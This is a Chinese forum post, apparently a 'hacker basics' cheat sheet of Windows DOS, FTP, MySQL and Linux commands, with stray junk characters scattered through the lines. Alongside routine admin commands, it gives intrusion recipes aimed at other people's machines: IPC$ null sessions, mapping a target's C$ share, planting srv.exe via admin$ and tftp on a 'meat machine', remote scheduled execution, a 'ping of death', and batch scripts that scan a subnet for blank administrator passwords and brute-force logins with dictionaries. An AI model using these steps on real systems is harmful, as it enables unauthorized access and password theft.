黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 . D3 O- a7 s% Q; `- g6 G
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
) I: q$ E! j! P8 y) A3 q% y. Onet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
3 M4 ]& W1 A( ]7 H7 Pnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
) [+ L9 Q7 v2 q6 q+ ?net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
& y& R3 U9 o, [* f- Cnet use h: /del 删除映射对方到本地的为H:的映射 ) @9 D7 r# @$ q0 {
net user 用户名　密码　/add 建立用户
7 R+ C) ]4 @) _net user guest /active:yes 激活guest用户
1 Y8 {8 S% ?2 j. Vnet user 查看有哪些用户   _4 N" O, B* d' r" K; \* M
net user 帐户名 查看帐户的属性
& m, p7 O6 U9 S( J7 Lnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 : \! O5 F! `( w; {5 g/ ^2 w
net start 查看开启了哪些服务
" F/ I: e: O" l* h, lnet start 服务名　 开启服务；(如:net start telnet， net start schedule) : T9 t( f4 B/ q, Z5 s! g. l
net stop 服务名 停止某服务
8 h1 T8 B" k1 Y; ^% D# y) hnet time \\目标ip 查看对方时间
4 R4 i! X0 G" r( Enet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 * M4 i( ?& v6 C4 C
net view 查看本地局域网内开启了哪些共享
' |1 l+ `: c( v' e4 @% Xnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 0 j- z* {7 W8 o' d; w, g
net config 显示系统网络设置 8 J3 F1 H* z+ X1 a" p1 ]2 o
net logoff 断开连接的共享
0 J5 Z4 Y! J5 h7 O" c) Onet pause 服务名 暂停某服务
1 q; h2 L1 l& X6 ]net send ip "文本信息" 向对方发信息 " F. `6 x0 _9 @8 t
net ver 局域网内正在使用的网络连接类型和信息
7 W9 P9 `3 E/ @9 Hnet share 查看本地开启的共享 - y" Y$ r8 Z# @$ M
net share ipc$ 开启ipc$共享
7 h7 z7 m1 k% G0 B" p4 L% Q% q% Lnet share ipc$ /del 删除ipc$共享 $ f  ?4 ]3 f2 S) E# n9 w5 h, E4 h0 T. ~
net share c$ /del 删除C：共享
: J0 R. a) u/ n7 h  o6 ?net user guest 12345 用guest用户登陆后用将密码改为12345
! ?. I+ y4 {! z7 T3 i. B6 o, g% fnet password 密码 更改系统登陆密码 ! w  f: f* P7 p- b
netstat -a 查看开启了哪些端口,常用netstat -an 1 ]1 j0 D; \) G3 N7 F6 ^2 I
netstat -n 查看端口的网络连接情况，常用netstat -an 9 j$ J2 Q8 R9 F+ x& |( s5 g% N2 G
netstat -v 查看正在进行的工作   o: h' C$ N$ L) r
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
7 Y. |3 Z' @, `8 [4 k1 h0 I  Qnetstat -s 查看正在使用的所有协议使用情况 ! x  S: ]- ]- f' N/ D0 b* F( I
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
" S) G9 ^* h# K1 N+ ?, Ftracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
- M+ A7 @6 r& @  C; H4 p* Sping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 3 `3 x# c6 s3 h; R  }0 K" S% _% v$ Y
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) $ _5 d3 K4 T, o, c2 F5 Y- [
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 / \# n  \1 ~+ [4 g! m8 o
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
7 `6 L& O+ b0 B' O# z- B& |6 Dkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
' R# X0 e4 G4 n3 @del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 3 n' G. v, X$ i
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
) n% b0 \& q! M$ |% _* R1 vmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
# B( a6 ]1 Z+ D* D1 j4 F/ ?* {% Z/ Xfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 ' O3 x/ g! U7 ?! Z) T
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
  l( u% P: u. l$ H; i! O/ J. jat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
/ U+ Y  G2 O# Vat id号 /delete 停止某个已注册的计划任务 ) ?$ I$ W; A% G  P! C# @
at 查看所有的计划任务 / e' R& d+ s. n% {( @
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 , ?! h) B( |/ J# r' A
finger username @host 查看最近有哪些用户登陆 # l) t9 d, S2 z! Q( b
telnet ip 端口 远和登陆服务器,默认端口为23 ; u8 {  S9 r" Q: d8 s1 k
open ip 连接到IP（属telnet登陆后的命令）
! T1 B9 h2 }7 s& ~$ H. I, Ntelnet 在本机上直接键入telnet 将进入本机的telnet & X; e! N5 k8 `5 A8 _# q6 M
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
) n) l9 y# ]+ Z/ }* z6 ~) u9 o1 ?# Icopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 5 T6 n3 n: J/ r
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 8 [" Z! p7 t- O5 A
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
9 u# E. Q+ P" y. yxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 ) }: I1 u; N  P% O
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
& a; P& Z# x+ h4 [( c& Utftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 + ]% [" u& E- _: B
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) 0 g( u0 ~5 E; ^- S- h! C
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface : p" X# k2 x4 h" l
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 ' t2 a4 X. Q0 k1 z( Q; w; h
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
( B* U- o" w8 J4 c9 Cmem 查看cpu使用情况
. N( q' n, M2 s8 o$ Pattrib 文件名(目录名) 查看某文件（目录）的属性
4 o2 Q2 }' r# S' f* A4 Sattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 3 X6 e# a  R/ f, l' u
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 % F5 L. M1 l% D
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
9 k6 I  N2 u* S  nset 指定环境变量名称=要指派给变量的字符 设置环境变量
$ S  o/ [: j4 i7 A5 C9 Kset 显示当前所有的环境变量
1 q1 N9 W7 W: P1 b8 C9 T, Hset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
# h+ j+ A' b0 Z9 W1 D8 ]pause 暂停批处理程序，并显示出：请按任意键继续....
5 R& Z0 p2 G( ~; p. ^% k5 eif 在批处理程序中执行条件处理（更多说明见if命令及变量） 7 }3 Z& h6 Y  _6 ^
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） 6 `& _% T  h6 D0 t' F# s
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） , x: V" k! i0 ^& w* j9 o2 F" s5 K/ B
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 5 g8 V9 B3 H4 X  K$ l% [# g; J
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
( l( b2 d0 g$ T, i( |2 decho 信息 在屏幕上显示出信息
1 x! v) r* s  u; ~$ N! Kecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 . M! s- j5 O/ }8 u& S7 N
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
5 L+ @8 L3 Q8 T' {$ wfind 文件名 查找某文件
" A0 u0 G) s9 V3 m; h, {title 标题名字 更改CMD窗口标题名字 & T8 v( X0 @6 ?& v2 P' B( d+ `
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 ) m, ?. t% x% T% Z, o
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) 4 u! {8 E  C% t# k7 d
print 文件名 打印文本文件 $ L, p0 Q! y3 t) f2 t" Y. |
ver 在DOS窗口下显示版本信息 2 W- J* \$ E" k  U% i: ]7 f) O5 F& v
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
" W  h  \' M- Y8 L9 \$ w0 @format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
$ R8 L5 E6 k" m7 g/ A" R7 {md　目录名 创建目录 ( D7 c) t, \. V9 n; z9 m
replace 源文件　要替换文件的目录 替换文件 & _; M8 w  z0 ^- ?9 ]7 a
ren 原文件名　新文件名 重命名文件名
( y8 ?2 }9 p. l# Ptree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 ; P" D' |" w/ |$ o/ k2 V- C
type 文件名 显示文本文件的内容
) ?& j9 |. p1 u: w2 M- A: e( }more 文件名 逐屏显示输出文件
  A, j: l6 V5 z3 udoskey 要锁定的命令＝字符
4 V; A3 `3 I% K- D, ~! Edoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= 0 B' I$ H% p0 f
taskmgr 调出任务管理器
6 N, t/ D. o# ?4 A+ i% D, vchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
/ N* M1 g) x  S* r( Ntlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
& T$ F; n) Y4 |exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
6 x) \. p$ |  h8 h/ z  Ppath 路径\可执行文件的文件名 为可执行文件设置一个路径。
0 {4 ~6 A+ p" U) |1 f* bcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
, k" H9 J5 D, i& Y5 m) ]regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； , b7 K1 J  U( K3 |. B9 i7 x, h. @
regedit /e 注册表文件名 导出注册表 . c8 d& G1 N* u$ P  y8 p/ C. U  E
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 ! w! `9 t$ ]5 J* ^; c# r
cacls 文件名 查看文件的访问用户权限列表 7 w0 U* p- P/ s/ u$ I( f. J- N. q
REM 文本内容 在批处理文件中添加注解
0 r2 j6 b0 w, V9 M( [netsh 查看或更改本地网络配置情况0 K; G& q- s6 V& o
IIS服务命令：0 D! V2 ^  d% e9 h, p
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
' I4 L2 F& o; M. eiisreset /start或stop 启动（停止）所有Internet服务 , o, D: t$ s* k1 Z4 L+ e0 g
iisreset /restart 停止然后重新启动所有Internet服务
' d4 A% r# i) q# Q7 Z* tiisreset /status 显示所有Internet服务状态
$ K! v& o2 g( k) Ciisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
' {& A! y7 N0 n7 niisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 3 k8 j: `+ e! r& w
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
  h( J: ]/ Z3 v  k9 Wiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
* e  J( X1 Z; Q) W$ JFTP 命令： (后面有详细说明内容) $ E" ]* g% U& x) I7 B
ftp的命令行格式为:
8 W* S" f0 C  i# yftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。2 ]+ M" s- \9 M
－d 使用调试方式。
' P# ^) i3 d! O4 F－n 限制ftp的自动登录,即不使用.netrc文件。
4 k! e9 C* ?' ^－g 取消全局文件名。
0 o! j! Q1 D) t4 _' I, thelp [命令] 或 ？[命令] 查看命令说明
% |* q% J" t7 e. ]* dbye 或 quit 终止主机FTP进程,并退出FTP管理方式. : J3 R' O& V' i1 z9 A% r* D- f( p
pwd 列出当前远端主机目录   y( V& L( B7 B9 X# R1 p+ {
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 ) x; Y$ X0 f; f
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 ) T) ?2 z5 Y' y  X: y
mget [remote-files] 从远端主机接收一批文件至本地主机 9 Q$ s+ z0 Y. e" j* S
mput local-files 将本地主机中一批文件传送至远端主机
, x3 G4 ]1 [) N" H0 |% gdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 % u9 d5 g: |8 c7 q
ascii 设定以ASCII方式传送文件(缺省值)
# [4 _. |% Z+ D- z, {bin 或 image 设定以二进制方式传送文件
* |, z5 w' a7 C2 Ibell 每完成一次文件传送,报警提示 ) L. |& M  G3 |! m* |
cdup 返回上一级目录 ' \1 T  T, I7 H4 T. c; f
close 中断与远程服务器的ftp会话(与open对应)
! k5 C+ T. {5 r  G3 Wopen host[port] 建立指定ftp服务器连接,可指定连接端口 8 e/ J; }# y4 l6 A7 K
delete 删除远端主机中的文件 2 @& e2 a# C2 k% {8 O9 _
mdelete [remote-files] 删除一批文件 % M: {- i$ y, i( t+ S
mkdir directory-name 在远端主机中建立目录 0 W; D1 T# V( `/ d9 x& X
rename [from] [to] 改变远端主机中的文件名
% n& W# w  Q0 X# srmdir directory-name 删除远端主机中的目录 1 W: P% D# g4 m+ W; h  W
status 显示当前FTP的状态 3 Z# }$ g$ y8 N; U' n% ~
system 显示远端主机系统类型
* C2 ]0 x* {, `; N9 _/ n( J' ouser user-name [password] [account] 重新以别的用户名登录远端主机 7 W' r6 j& K1 i# S. U
open host [port] 重新建立一个新的连接 7 z% n; r6 o/ S( w- h8 X+ K
prompt 交互提示模式
8 g3 \8 A) }8 t* ~* jmacdef 定义宏命令 5 Z' [* S; E5 {7 l  q+ F; {
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
5 e0 J5 H7 \  s9 A+ X5 B, [; G/ }chmod 改变远端主机的文件权限 8 \) @, s' i- l7 I: y, [
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 $ C$ w7 g! D3 z3 ]/ A* B$ p- |
cd remote－dir 进入远程主机目录
+ n. x; ~& z) \! B+ kcdup 进入远程主机目录的父目录 & b7 i, q8 d  g! J6 Z
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip ( z+ w$ A, y6 f8 s% A/ m
MYSQL 命令： 0 l9 U! i+ m: y# J7 n/ z7 ~
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。  f4 @( G2 V! }# m/ ?: H1 j7 Q
（例：mysql -h110.110.110.110 -Uroot -P123456
4 B! |' h* v1 J; C8 E2 m注:u与root可以不用加空格，其它也一样）
* t! e: W" v: M/ K& s' wexit 退出MYSQL 0 I9 P4 E) k; {$ X4 S5 t4 f
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
' p, i3 i2 D, V0 h& L4 rgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 7 N$ l+ F+ ^9 a2 A
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
2 d4 j$ {, m6 Z+ u1 d- yuse mysql；
. m7 o8 J) p% S/ r; sshow tables; 显示库中的数据表 6 n# S, m3 W+ o
describe 表名; 显示数据表的结构 ( u) |; X0 i9 o. f0 ^" h9 l: o
create database 库名; 建库
8 B! }: o4 r$ Luse 库名；6 O7 D) P0 l( I, F
create table 表名 (字段设定列表)； 建表 8 }, I' `4 C9 ]% {/ s
drop database 库名;   f$ ]7 ]  A8 r! i/ c
drop table 表名； 删库和删表
* X2 N- K7 g+ ddelete from 表名; 将表中记录清空 7 N% [0 _! l" r6 V( A
select * from 表名; 显示表中的记录
* }2 r1 K# s# Y, c( R5 smysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
% d. B- q  m  Fwin2003系统下新增命令（实用部份）： & f$ F  V1 ]. U+ Q7 G; z
shutdown /参数 关闭或重启本地或远程主机。% x; f( E# m/ n( W3 |7 v4 h
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
0 o% `. H" D8 X) i例：shutdown /r /t 0 立即重启本地主机（无延时）
0 F. I) V" R& z9 ^; Gtaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。) I3 Y% [+ F. c0 `( z) N6 w
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
- R/ h4 G* O7 d: t4 R. z; ^/ E/ \tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
- U. r3 r2 f& n. L参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程% _7 T8 p& e6 @4 k
Linux系统下基本命令： 要区分大小写
/ z4 f, D/ d# p- b2 s$ Muname 显示版本信息（同win2K的 ver）
! E1 B1 X. o7 |- M% g/ t$ ]6 `dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
9 o2 a6 r! c1 r% \+ h; wpwd 查询当前所在的目录位置 8 K2 `4 p9 E# D% r& M
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 & [3 N0 q6 L  ]8 o3 |
cat 文件名 查看文件内容 5 q) g+ m1 A9 Z3 w* T- ]& @" |8 D
cat >abc.txt 往abc.txt文件中写上内容。 + b9 \2 n- w+ x' `# f2 x1 g9 W5 P0 x
more 文件名 以一页一页的方式显示一个文本文件。
5 j7 U! p4 J* w/ p' t! Ocp 复制文件 % H: j* T# ~8 O6 r- f
mv 移动文件 , C0 P5 Q1 F3 f/ a, s
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
8 b5 S5 J# d! N7 @: B9 x/ s% `mkdir 目录名 建立目录
/ s( M/ h! @$ W5 d$ U2 b/ Q! irmdir 删除子目录，目录内没有文档。
0 G: j# u' g7 ]3 n- t* jchmod 设定档案或目录的存取权限 % T6 a1 F! Q- P- n; e6 y
grep 在档案中查找字符串
7 k5 C" z5 {% Q' {, E7 Gdiff 档案文件比较
  D& j! z& _. n  }find 档案搜寻
/ ?& I( E+ q6 B( P! Ldate 现在的日期、时间 ! C' u% r+ z! K7 D% b4 j
who 查询目前和你使用同一台机器的人以及Login时间地点 3 \* _& ^8 f* v; q/ n1 r% X; }
w 查询目前上机者的详细资料
% ?* G  z' n* t) X2 zwhoami 查看自己的帐号名称
: F. W2 ^# n4 mgroups 查看某人的Group
$ Y4 x9 t0 c: B& g* P, C$ wpasswd 更改密码 ( E; I& K% H1 p$ d
history 查看自己下过的命令
  S5 k$ M/ V) a$ e2 i3 gps 显示进程状态
6 N+ ]6 i4 i3 E+ j: J# Z1 z6 r" mkill 停止某进程
9 H( g# P% f3 t6 g2 Q9 i% ~* l- `gcc 黑客通常用它来编译C语言写的文件
; O6 O9 h5 e0 l) ysu 权限转换为指定使用者 , Z" |2 ~9 u! G- C) I& N# R+ C" F
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 + q/ A" u% \; x1 v1 N  m
ftp ftp连接上某服务器（同win2K/ \6 K7 }, ^. u! @, o
附：批处理命令与变量1 ~/ `( s& W6 g
1：for命令及变量 基本格式： ; _& j; c* x) G" e& ^+ p
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。+ V, X5 f5 q! Y# {( w9 U4 D: e
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
- a+ P( }- \2 g! K/ [(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}, f. z/ \2 q: x: b7 `) u
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
. A/ `5 o/ X8 |: L* L; Lcommand_parameters：为特定命令指定参数或命令行开关( L7 J! i5 E6 H' y5 Z8 }
IN (set)：指在(set)中取值；DO command ：指执行command
* K1 a/ J1 x# S参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 5 Y) Z+ {, D5 V( T' o% G2 o
用法举例： 4 c$ `- a, J: B$ m- K3 z6 g, W* r; c
@echo off ) s1 e& W, [, n9 b, @& _
echo 用法格式：test.bat *.*.* > test.txt & u5 V" L' q: y& r
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt $ s+ r6 m1 q* Y  I; u
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。5 w/ X) a& ?! P' _+ v) H. W' D; `
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 0 S1 l: J$ u3 ?% v7 s0 h
@echo off , H9 F, q3 [; i+ |# z* r
echo 用法格式：ok.bat ip - {+ K! l& t% T. I: N+ J# b: w
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 ; b: R* c5 t2 \7 R9 C
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。- y  q, Z! K) q; b6 N$ P
2：if命令及变量 基本格式：
* {8 `# a0 w' ]/ f+ GIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。9 Z" b, n0 C% G7 T4 S
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。! [, P  Y# @; d. |7 K7 X& p
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 " y* k0 w$ Z. ^9 i6 Q) N
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
. j' d% K( ~0 X  t6 ^; i. a例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 3 \2 Y; r9 [9 `2 b" H
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。8 L1 v, L( r* r
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 ; V; l$ B+ e" J- i& d
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”